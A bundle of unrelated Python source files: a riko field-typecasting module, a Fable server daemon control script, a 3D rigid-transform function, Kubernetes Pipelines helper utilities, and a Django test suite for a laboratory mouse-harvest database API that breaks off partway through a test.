# -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
"""
riko.modules.typecast
~~~~~~~~~~~~~~~~~~~~~
Provides functions for casting fields into specific types.
Examples:
basic usage::
>>> from riko.modules.typecast import pipe
>>>
>>> conf = {'type': 'date'}
>>> next(pipe({'content': '5/4/82'}, conf=conf))['typecast']['year']
1982
Attributes:
OPTS (dict): The default pipe options
DEFAULTS (dict): The default parser options
"""
import pygogo as gogo
from . import processor
from riko.utils import cast
OPTS = {'field': 'content'}
DEFAULTS = {'type': 'text'}
logger = gogo.Gogo(__name__, monolog=True).logger
def parser(content, objconf, skip=False, **kwargs):
""" Parsers the pipe content
Args:
content (scalar): The content to cast
objconf (obj): The pipe configuration (an Objectify instance)
skip (bool): Don't parse the content
kwargs (dict): Keyword arguments
Kwargs:
assign (str): Attribute to assign parsed content (default: typecast)
stream (dict): The original item
Returns:
dict: The item
Examples:
>>> from meza.fntools import Objectify
>>>
>>> item = {'content': '1.0'}
>>> objconf = Objectify({'type': 'int'})
>>> kwargs = {'stream': item, 'assign': 'content'}
>>> parser(item['content'], objconf, **kwargs)
1
"""
return kwargs['stream'] if skip else cast(content, objconf.type)
@processor(DEFAULTS, isasync=True, **OPTS)
def async_pipe(*args, **kwargs):
"""A processor module that asynchronously parses a URL into its components.
Args:
item (dict): The entry to process
kwargs (dict): The keyword arguments passed to the wrapper
Kwargs:
conf (dict): The pipe configuration. May contain the key 'type'.
type (str): The object type to cast to (default: text)
assign (str): Attribute to assign parsed content (default: typecast)
field (str): Item attribute to operate on (default: 'content')
Returns:
        Deferred: twisted.internet.defer.Deferred item with type-cast content
Examples:
>>> from riko.bado import react
>>> from riko.bado.mock import FakeReactor
>>>
>>> def run(reactor):
... callback = lambda x: print(next(x)['typecast'])
... d = async_pipe({'content': '1.0'}, conf={'type': 'int'})
... return d.addCallbacks(callback, logger.error)
>>>
>>> try:
... react(run, _reactor=FakeReactor())
... except SystemExit:
... pass
...
1
"""
return parser(*args, **kwargs)
@processor(DEFAULTS, **OPTS)
def pipe(*args, **kwargs):
"""A processor that parses a URL into its components.
Args:
item (dict): The entry to process
kwargs (dict): The keyword arguments passed to the wrapper
Kwargs:
conf (dict): The pipe configuration. May contain the key 'type'.
type (str): The object type to cast to (default: text)
assign (str): Attribute to assign parsed content (default: typecast)
field (str): Item attribute to operate on (default: 'content')
Yields:
        dict: an item with type-cast content
Examples:
>>> from datetime import datetime as dt
>>> next(pipe({'content': '1.0'}, conf={'type': 'int'}))['typecast']
1
>>> item = {'content': '5/4/82'}
>>> conf = {'type': 'date'}
>>> date = next(pipe(item, conf=conf, emit=True))['date']
>>> date.isoformat() == '1982-05-04T00:00:00+00:00'
True
>>> item = {'content': dt(1982, 5, 4).timetuple()}
>>> date = next(pipe(item, conf=conf, emit=True))['date']
>>> date.isoformat() == '1982-05-04T00:00:00+00:00'
True
>>> item = {'content': 'False'}
>>> conf = {'type': 'bool'}
>>> next(pipe(item, conf=conf, emit=True))
False
"""
return parser(*args, **kwargs)
|
import os
import sys
import json
import time
import signal
import psutil
import filelock
import webbrowser
from fable import config
from fable.back.http_server import run
def status():
try:
with open(config.INFO) as f:
info = json.loads(f.read())
if info['pid'] >= 0 and psutil.pid_exists(info['pid']):
return info['pid'], info['url']
except FileNotFoundError:
pass
return -1, -1
def print_status():
with filelock.FileLock(config.LOCK):
pid, url = status()
if pid < 0:
print('No running Fable processes found')
else:
print('Fable runs: pid', pid, 'url', url)
def start():
os.makedirs(config.FOLD, exist_ok=True)
with filelock.FileLock(config.LOCK):
pid, url = status()
if pid >= 0:
print('Fable already runs (pid ' + str(pid) + ') on address', url)
return
with open(config.INFO, 'w') as f:
link = 'http://{0}:{1}/{2}'.format(config.host, config.port, config.root)
f.write(json.dumps({'pid': os.getpid(), 'url': link}))
try:
run()
finally:
with filelock.FileLock(config.LOCK):
os.remove(config.INFO)
def stop():
os.makedirs(config.FOLD, exist_ok=True)
with filelock.FileLock(config.LOCK):
pid, _ = status()
if pid < 0:
print('Warning: no running Fable processes found')
return
try:
            print('Sending termination signal to (pid ' + str(pid) + ')')
os.kill(pid, signal.SIGINT)
except OSError:
pass
for w in [0, 1, 4]:
time.sleep(w)
if not psutil.pid_exists(pid):
return
        print('Could not stop Fable (pid ' + str(pid) + ')')
def open_browser():
with filelock.FileLock(config.LOCK):
pid, url = status()
if pid < 0:
print('No running Fable processes found')
else:
url = url.replace('0.0.0.0', 'localhost')
webbrowser.open_new_tab(url)
def spawnDaemon(func):
# From: https://stackoverflow.com/questions/6011235/run-a-program-from-python-and-have-it-continue-to-run-after-the-script-is-kille
# do the UNIX double-fork magic, see Stevens' "Advanced Programming in the UNIX Environment" for details (ISBN 0201563177)
try:
pid = os.fork()
if pid > 0:
# parent process, return and keep running
return
except OSError as e:
print("fork #1 failed: %d (%s)" % (e.errno, e.strerror), file=sys.stderr)
sys.exit(1)
os.setsid()
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError as e:
print("fork #2 failed: %d (%s)" % (e.errno, e.strerror), file=sys.stderr)
sys.exit(1)
# do stuff
func()
# all done
os._exit(os.EX_OK)
def main():
choices = ('start', 'stop', 'status', 'browser')
if len(sys.argv) < 2 or sys.argv[1] not in choices:
print('Usage:', sys.argv[0], '|'.join(choices) + ' [port Number] [host Number] [root String]')
return
if sys.argv[1] == 'start':
spawnDaemon(start)
elif sys.argv[1] == 'status':
print_status()
elif sys.argv[1] == 'browser':
open_browser()
elif sys.argv[1] == 'stop':
stop()
if __name__ == "__main__":
main()
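# Illustrative command-line usage (an assumption about packaging; the module
# may instead be invoked directly with `python -m`):
#   fable start    # fork a daemon and run the HTTP server
#   fable status   # print the pid and url of a running instance
#   fable browser  # open the running instance in the default web browser
#   fable stop     # send SIGINT and wait for the process to exit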
|
#!/usr/bin/python
from numpy import *
from math import sqrt
# Input: expects 3xN matrix of points
# Returns R,t
# R = 3x3 rotation matrix
# t = 3x1 column vector
def rigid_transform_3D(A, B):
assert len(A) == len(B)
    num_rows, num_cols = A.shape
if num_rows != 3:
raise Exception("matrix A is not 3xN, it is {}x{}".format(num_rows, num_cols))
    num_rows, num_cols = B.shape
if num_rows != 3:
raise Exception("matrix B is not 3xN, it is {}x{}".format(num_rows, num_cols))
# find mean column wise
centroid_A = mean(A, axis=1)
centroid_B = mean(B, axis=1)
# ensure centroids are 3x1 (necessary when A or B are
# numpy arrays instead of numpy matrices)
centroid_A = centroid_A.reshape(-1, 1)
centroid_B = centroid_B.reshape(-1, 1)
# subtract mean
Am = A - tile(centroid_A, (1, num_cols))
Bm = B - tile(centroid_B, (1, num_cols))
H = matmul(Am, transpose(Bm))
# sanity check
#if linalg.matrix_rank(H) < 3:
# raise ValueError("rank of H = {}, expecting 3".format(linalg.matrix_rank(H)))
# find rotation
U, S, Vt = linalg.svd(H)
    R = Vt.T @ U.T
# special reflection case
if linalg.det(R) < 0:
print("det(R) < R, reflection detected!, correcting for it ...\n");
Vt[2,:] *= -1
        R = Vt.T @ U.T
    t = -R @ centroid_A + centroid_B
return R, t
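# Illustrative self-check (not part of the original snippet; the names below are
# made up for the example): apply a known rotation/translation to random points
# and verify that rigid_transform_3D recovers it.
if __name__ == "__main__":
    R_true, _ = linalg.qr(random.rand(3, 3))   # random orthogonal matrix
    if linalg.det(R_true) < 0:
        R_true[:, 2] *= -1                     # force a proper rotation (det = +1)
    t_true = random.rand(3, 1)

    A = random.rand(3, 10)                     # 3xN source points
    B = R_true @ A + t_true                    # transformed points

    R_est, t_est = rigid_transform_3D(A, B)
    rmse = sqrt(mean(square(R_est @ A + t_est - B)))
    print("RMSE:", rmse)                       # should be close to zero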
|
# Lint as: python2, python3
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for the kubernetes related functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import enum
import os
from typing import Text
from kubernetes import client as k8s_client
from kubernetes import config as k8s_config
# Name of the main container that Argo workflow launches. As KFP internally uses
# Argo, container name for the KFP Pod is also the same.
# https://github.com/argoproj/argo/blob/master/workflow/common/common.go#L14
ARGO_MAIN_CONTAINER_NAME = 'main'
# Set of environment variables that are set in the KubeFlow Pipelines pods.
KFP_POD_NAME = 'KFP_POD_NAME'
KFP_NAMESPACE = 'KFP_NAMESPACE'
class PodPhase(enum.Enum):
"""Phase of the Kubernetes Pod.
Pod phases are defined in
https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#pod-phase.
"""
PENDING = 'Pending'
RUNNING = 'Running'
SUCCEEDED = 'Succeeded'
FAILED = 'Failed'
UNKNOWN = 'Unknown'
@property
def is_done(self):
return self == self.SUCCEEDED or self == self.FAILED
class RestartPolicy(enum.Enum):
"""Restart policy of the Kubernetes Pod container.
Restart policies are defined in
https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#restart-policy
"""
ALWAYS = 'Always'
ON_FAILURE = 'OnFailure'
NEVER = 'Never'
class PersistentVolumeAccessMode(enum.Enum):
"""Access mode of the Kubernetes Persistent Volume.
Access modes are defined in
https://kubernetes.io/docs/concepts/storage/persistent-volumes/#access-modes
"""
READ_WRITE_ONCE = 'ReadWriteOnce'
READ_ONLY_MANY = 'ReadOnlyMany'
READ_WRITE_MANY = 'ReadWriteMany'
class _KubernetesClientFactory(object):
"""Factory class for creating kubernetes API client."""
def __init__(self):
self._config_loaded = False
self._inside_cluster = False
@property
def inside_cluster(self):
"""Whether current environment is inside the kubernetes cluster."""
if not self._config_loaded:
self._LoadConfig()
return self._inside_cluster
def _LoadConfig(self) -> None: # pylint: disable=invalid-name
"""Load the kubernetes client config.
Depending on the environment (whether it is inside the running kubernetes
cluster or remote host), different location will be searched for the config
file. The loaded config will be used as a default value for the clients this
factory is creating.
If config is already loaded, it is a no-op.
Raises:
kubernetes.config.ConfigException: If fails to locate configuration in
current environment.
"""
try:
# If this code is running inside Kubernetes Pod, service account admission
# controller [1] sets volume mounts in which the service account tokens
# and certificates exists, and it can be loaded using
# `load_incluster_config()`.
#
# [1]
# https://kubernetes.io/docs/reference/access-authn-authz/service-accounts-admin/#service-account-admission-controller
self._inside_cluster = True
k8s_config.load_incluster_config()
except k8s_config.ConfigException:
# If loading incluster config fails, it means we're not running the code
# inside Kubernetes cluster. We try to load ~/.kube/config file, or the
# filename from the KUBECONFIG environment variable.
# It will raise kubernetes.config.ConfigException if no kube config file
# is found.
self._inside_cluster = False
k8s_config.load_kube_config()
self._config_loaded = True
def MakeCoreV1Api(self) -> k8s_client.CoreV1Api: # pylint: disable=invalid-name
"""Make a kubernetes CoreV1Api client."""
if not self._config_loaded:
self._LoadConfig()
return k8s_client.CoreV1Api()
_factory = _KubernetesClientFactory()
def make_core_v1_api() -> k8s_client.CoreV1Api:
"""Make a kubernetes CoreV1Api client."""
return _factory.MakeCoreV1Api()
def is_inside_cluster() -> bool:
"""Whether current running environment is inside the kubernetes cluster."""
return _factory.inside_cluster
def is_inside_kfp() -> bool:
"""Whether current running environment is inside the KFP runtime."""
return (
is_inside_cluster()
and KFP_POD_NAME in os.environ
and KFP_NAMESPACE in os.environ
)
def get_kfp_namespace() -> Text:
"""Get kubernetes namespace for the KFP.
Raises:
RuntimeError: If KFP pod cannot be determined from the environment, i.e.
this program is not running inside the KFP.
Returns:
The namespace of the KFP app, to which the pod this program is running on
belongs.
"""
try:
return os.environ[KFP_NAMESPACE]
except KeyError:
raise RuntimeError('Cannot determine KFP namespace from the environment.')
def get_current_kfp_pod(client: k8s_client.CoreV1Api) -> k8s_client.V1Pod:
"""Get manifest of the KFP pod in which this program is running.
Args:
client: A kubernetes CoreV1Api client.
Raises:
RuntimeError: If KFP pod cannot be determined from the environment, i.e.
this program is not running inside the KFP.
Returns:
The manifest of the pod this program is running on.
"""
try:
namespace = os.environ[KFP_NAMESPACE]
pod_name = os.environ[KFP_POD_NAME]
return client.read_namespaced_pod(name=pod_name, namespace=namespace)
except KeyError:
raise RuntimeError('Cannot determine KFP pod from the environment.')
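# Illustrative usage sketch (not part of the original module): when this file is
# executed inside a KFP-launched pod, print the pod name and phase. Guarded so
# that importing the module is unaffected.
if __name__ == '__main__':
  if is_inside_kfp():
    pod = get_current_kfp_pod(make_core_v1_api())
    print('Running inside KFP pod %s (phase: %s)' %
          (pod.metadata.name, pod.status.phase))
  else:
    print('Not running inside a KFP pod.')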
|
import os
from django.test import TestCase
from rest_framework.test import APIRequestFactory
from .mvc_model.Error import DuplicationMouseError
from .mvc_model.databaseAdapter import GenericSqliteConnector
from .mvc_model.mouseFilter import MouseFilter, FilterOption
from .views import harvested_mouse_list, harvested_mouse_force_list
from .views import harvested_mouse_insertion
from .views import harvested_mouse_update
from .views import harvested_mouse_delete
from .models import HarvestedMouse, HarvestedBasedNumber, HarvestedAdvancedNumber
from datetime import datetime, timedelta
# Use in MVC model test
from harvestmouseapp.mvc_model.model import Mouse, MouseList, Record, AdvancedRecord
from harvestmouseapp.mvc_model.mouseAdapter import XmlModelAdapter, JsonModelAdapter
from harvestmouseapp.mvc_model.mouseViewer import XmlMouseViewer, JsonMouseViewer
import random
import string
import time
import copy
############################################
# Function name: create_mouse_object
# Description:
# This function creates the Mouse object and attaches the pfa and freeze records to it
############################################
def create_mouse_object(physical_id, handler, gender, mouseline, genotype,
birth_date, end_date, cog, phenotype, project_title, experiment, comment,
pfa_record, freeze_record):
harvested_mouse = Mouse(
handler=handler,
physical_id=physical_id,
gender=gender,
mouseline=mouseline,
genotype=genotype,
birth_date=birth_date,
end_date=end_date,
cog=cog,
phenotype=phenotype,
project_title=project_title,
experiment=experiment,
comment=comment
)
harvested_mouse.pfa_record = pfa_record
harvested_mouse.freeze_record = freeze_record
return harvested_mouse
############################################
# Function name: is_match_data
# Description:
# This function checks whether the provided target value matches the data in the
# given response
############################################
def is_match_data(data, keyword, target, child_keyword=None):
if isinstance(data, Mouse):
if not child_keyword:
if data.__dict__[keyword] == target:
return True
else:
if data.__dict__[keyword][child_keyword] == target:
return True
else:
for raw_data in data:
if not child_keyword:
if raw_data[keyword] == target:
return True
else:
if raw_data[keyword][child_keyword] == target:
return True
return False
############################################
# Function name: remove_if_matched
# Description: This function removes entries from list_to_matched
# that have corresponding objects in the data
# of the response
############################################
def remove_if_matched(data, keyword, list_to_matched, child_keyword=None):
keyword = '_Mouse__'+keyword
if child_keyword:
if 'liver' in child_keyword or 'others' in child_keyword:
child_keyword = '_Record__' + child_keyword
else:
child_keyword = '_AdvancedRecord__' + child_keyword
if isinstance(data, list):
for raw_data in data:
raw_data = raw_data.__dict__
if not child_keyword:
target_value = raw_data[keyword]
else:
target_value = raw_data[keyword].__dict__[child_keyword]
if target_value in list_to_matched:
list_to_matched.remove(target_value)
else:
if not child_keyword:
target_value = data[keyword]
else:
target_value = data[keyword].__dict__[child_keyword]
if target_value in list_to_matched:
list_to_matched.remove(target_value)
############################################
# Function name: make_request_and_check
# Description: This function sends the given type of request
# to the target URL and checks that the response
# status code matches the expected
# status code
############################################
def make_request_and_check(test_cases, data, url, request_object, expected_status_code, view_class,
is_view_class=False, viewer=None):
if viewer:
data = viewer.transform(data)
request = request_object(
path=url,
data=data,
format='json'
)
if is_view_class:
response = view_class.as_view()(request, *[], **{})
else:
response = view_class(request)
    # Request failed
if response.status_code != expected_status_code:
test_cases.assertTrue(False, 'Returned: ' + str(response.status_code))
return response
############################################
# Function name: force_refresh_cache
# Description: This function forces a refresh of the cached
# mouse list from the database
############################################
def force_refresh_cache(test_cases):
make_request_and_check(
test_cases=test_cases,
data=None,
url='/harvestedmouse/force_list',
request_object=test_cases.factory.get,
expected_status_code=200,
view_class=harvested_mouse_force_list
)
############################################
# Function name: check_model_view_objects
# Description: This function checks that the data in the response
# matches the expected numbers and values
############################################
def check_model_view_objects(test_cases, view_list_class, view_url, expect_num_of_return, list_to_matched,
expect_num_of_remain, keyword, remove_involved=True, target=None, find_matched=False,
is_view_class=False, data=None, child_keyword=None, adapter=None):
    # Check if the returned list of mice matches list_to_matched
# Create an instance of GET requests
if data is None:
request = test_cases.factory.get(
path=view_url
)
else:
request = test_cases.factory.get(
data=data,
path=view_url,
format='json'
)
if is_view_class:
response = view_list_class().as_view()(request, *[], **{})
else:
response = view_list_class(request)
data = adapter.transform(response.data)
is_list_and_size_is_expected = False
if isinstance(data, MouseList):
if len(data) == expect_num_of_return:
is_list_and_size_is_expected = True
if (isinstance(data, Mouse) and expect_num_of_return == 1) or is_list_and_size_is_expected:
        # Remove each entry in list_to_matched that exists in the data of the response
if remove_involved:
if '_mouse_list' in data.__dict__.keys():
data = data.__dict__['_mouse_list']
else:
data = data.__dict__
remove_if_matched(data, keyword, list_to_matched, child_keyword)
            # If the list is not empty,
            # it means the list returned by the
            # view is incorrect
if not (len(list_to_matched) == expect_num_of_remain):
test_cases.assertTrue(False)
else:
if find_matched:
if not (is_match_data(data, keyword, target, child_keyword)):
test_cases.assertTrue(False)
else:
if is_match_data(data, keyword, target, child_keyword):
test_cases.assertTrue(False)
else:
# Number of items retrieve was wrong
test_cases.assertTrue(False)
##############################################################################################################
# Unit Test name: Harvested Mouse test case
# Target: HarvestedMouse Object
# Description:
# 1. With a predefined inserted mouse, the function successfully retrieves the correct information
# 2. The API is able to create a new mouse entry based on the provided information
##############################################################################################################
class HarvestedMouseTestCase(TestCase):
# Setup function, insert required objects into the database
def setUp(self) -> None:
# Every test should use factory object to spawn the request object
self.factory = APIRequestFactory()
self.viewer = JsonMouseViewer()
self.adapter = JsonModelAdapter()
harvested_mouse = HarvestedMouse(
handler='handler1',
physicalId='12345678',
gender='M',
mouseLine='mouseLine1',
genoType='genoType1',
birthDate=datetime.now().date(),
endDate=datetime.now().date(),
confirmationOfGenoType=True,
phenoType='phenoType1',
projectTitle='projectTitle1',
experiment='experiementTesting',
comment='comment1'
)
harvested_mouse.save()
freeze_record = HarvestedBasedNumber(
harvestedMouseId=harvested_mouse,
liver=1,
liverTumor=1,
others='3'
)
freeze_record.save()
pfa_record = HarvestedAdvancedNumber(
harvestedMouseId=harvested_mouse,
liver=1,
liverTumor=1,
smallIntestine=1,
smallIntestineTumor=1,
skin=1,
skinHair=1,
others='5'
)
pfa_record.save()
# Pass requirement
    # 1. Create the mouse entry with the required fields
    # 2. Use the REST API to retrieve the information without a 404
    # 3. Match against the required fields set in the first requirement
def test_harvest_mouse_insert(self):
data_to_post = create_mouse_object(
handler='handler2',
physical_id='12345679',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
        # Make a request to list all the harvested mice
        # and match list_to_matched against the retrieved mouse list.
        # Matched entries are removed from list_to_matched;
        # the remainder should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=2,
list_to_matched=['handler1', 'handler2'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
# Pass requirement
    # 1. Create the mouse entry with the required fields
    # 2. Use the REST API to filter and retrieve the information without a 404
    # 3. Match against the required fields set in the first requirement
def test_filter_harvest_mouse_list(self):
force_refresh_cache(self)
data_to_post = create_mouse_object(
handler='handler1',
physical_id='12345679',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
data_to_post = create_mouse_object(
handler='handler2',
physical_id='1234567A',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
        # Make a request to list all the harvested mice
        # and match list_to_matched against the retrieved mouse list.
        # Matched entries are removed from list_to_matched;
        # the remainder should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=2,
list_to_matched=['handler1'],
expect_num_of_remain=0,
keyword='handler',
data={
'filter': 'handler@handler1'
},
adapter=self.adapter
)
# Pass requirement
# 1. Create arbitrary number of harvested mouse entries
    # 2. Query with multiple different keys
    # 3. Match against the required fields set in the 1st and 2nd requirements
def test_filter_advanced_harvest_mouse_list(self):
force_refresh_cache(self)
        # Insert handlers 0 to 4 with the same Expr1
        # and handlers 5 to 7 with the same Expr2.
        # Filtering with Expr1 and the special phenotype should return
        # handlers 0 to 2, excluding the default entry
experiment_1 = 'Expr1'
experiment_2 = 'Expr2'
normal_pheno = 'normal'
special_pheno = 'speical'
group_1_start = 0
group_1_stop = 4
group_2_stop = 8
list_to_matched = []
for i in range(group_1_start, group_2_stop):
if i <= group_1_stop:
experiment = experiment_1
if i <= group_1_stop - 2:
pheno = special_pheno
list_to_matched.append('handler' + str(i))
else:
pheno = normal_pheno
else:
experiment = experiment_2
pheno = normal_pheno
data_to_post = create_mouse_object(
handler='handler' + str(i),
physical_id='1234567A' + str(i),
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype=pheno,
project_title='projectTitle1',
experiment=experiment,
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
filter_option = 'experiment@{}$phenotype@{}'.format(experiment_1, special_pheno)
        # Make a request to list all the harvested mice
        # and match list_to_matched against the retrieved mouse list.
        # Matched entries are removed from list_to_matched;
        # the remainder should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=group_1_stop - 1,
list_to_matched=list_to_matched,
expect_num_of_remain=0,
keyword='handler',
data={
'filter': filter_option
},
adapter=self.adapter
)
# Pass requirement
# 1. Create arbitrary number of harvested mouse entries
    # 2. Query with multiple different keys
    # 3. Match against the required fields set in the 1st and 2nd requirements
def test_filter_datetime_harvest_mouse_list(self):
force_refresh_cache(self)
        # Insert handlers 0 to 7 with birth dates offset by i days.
        # Handlers 5 to 7 have birth dates on or after the specific date,
        # so filtering by birth_date should return handlers 5 to 7
        # and exclude the earlier entries
group_1_start = 0
group_2_start = 5
group_2_stop = 8
list_to_matched = []
specific_date = datetime.now()
for i in range(group_1_start, group_2_stop):
cur_date = datetime.now().date() + timedelta(days=i)
if i == group_2_start:
specific_date = cur_date
if i >= group_2_start:
list_to_matched.append('handler' + str(i))
data_to_post = create_mouse_object(
handler='handler' + str(i),
physical_id='1234567A' + str(i),
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=cur_date,
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='Experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=JsonMouseViewer()
)
filter_option = 'birth_date@{}@{}'.format(str(specific_date), 0)
        # Make a request to list all the harvested mice
        # and match list_to_matched against the retrieved mouse list.
        # Matched entries are removed from list_to_matched;
        # the remainder should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=group_2_stop - group_2_start,
list_to_matched=list_to_matched.copy(),
expect_num_of_remain=0,
keyword='handler',
data={
'filter': filter_option
},
adapter=JsonModelAdapter()
)
list_to_matched.remove('handler' + str(group_2_stop - 1))
        # Make a request to list all the harvested mice
        # and match list_to_matched against the retrieved mouse list.
        # Matched entries are removed from list_to_matched;
        # the remainder should be 0
filter_option = 'birth_date@{}@{}$birth_date@{}@{}'.format(
str(specific_date), 0, str(specific_date + timedelta(days=1)), 2)
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=group_2_stop - group_2_start - 1,
list_to_matched=list_to_matched,
expect_num_of_remain=0,
keyword='handler',
data={
'filter': filter_option
},
adapter=JsonModelAdapter()
)
# Pass requirement
    # 1. Insert multiple mice at one time
    # 2. Match against the required field set
def test_advanced_harvest_mouse_insert_multiple(self):
# Force get the new mouse list from the db
force_refresh_cache(self)
list_to_matched = []
group_start = 0
group_stop = 8
mouse_list = MouseList()
for i in range(group_start, group_stop):
list_to_matched.append('handler' + str(i))
data_to_post = create_mouse_object(
handler='handler' + str(i),
physical_id='1234567A' + str(i),
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
mouse_list.add_mouse(data_to_post)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=mouse_list,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=mouse_list.get_size() + 1,
list_to_matched=list_to_matched,
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
# Pass requirement
    # 1. Insert a mouse and update its fields
    # 2. Match against the updated field set
def test_harvest_mouse_update(self):
# Force get the new mouse list from the db
force_refresh_cache(self)
data_to_post = create_mouse_object(
handler='handler1',
physical_id='12345679',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
# Change handler to handler2
data_to_post.handler = 'handler2'
# Change pfaRecord.smallIntestineTumor to 15
data_to_post.pfa_record.small_intenstine_tumor = 15
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/update',
request_object=self.factory.put,
expected_status_code=200,
view_class=harvested_mouse_update,
viewer=self.viewer
)
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=2,
list_to_matched=['handler1', 'handler2'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=2,
list_to_matched=[1, 15],
expect_num_of_remain=0,
keyword='pfa_record',
child_keyword='small_intenstine_tumor',
adapter=self.adapter
)
# Pass requirement
    # 1. Update multiple mice at one time
    # 2. Match against the updated field set
def test_advanced_harvest_mouse_multiple_update(self):
# Force get the new mouse list from the db
force_refresh_cache(self)
data_to_post_2 = create_mouse_object(
handler='handler2',
physical_id='12345679',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
data_to_post_3 = create_mouse_object(
handler='handler3',
physical_id='1234567B',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
mouse_list = MouseList()
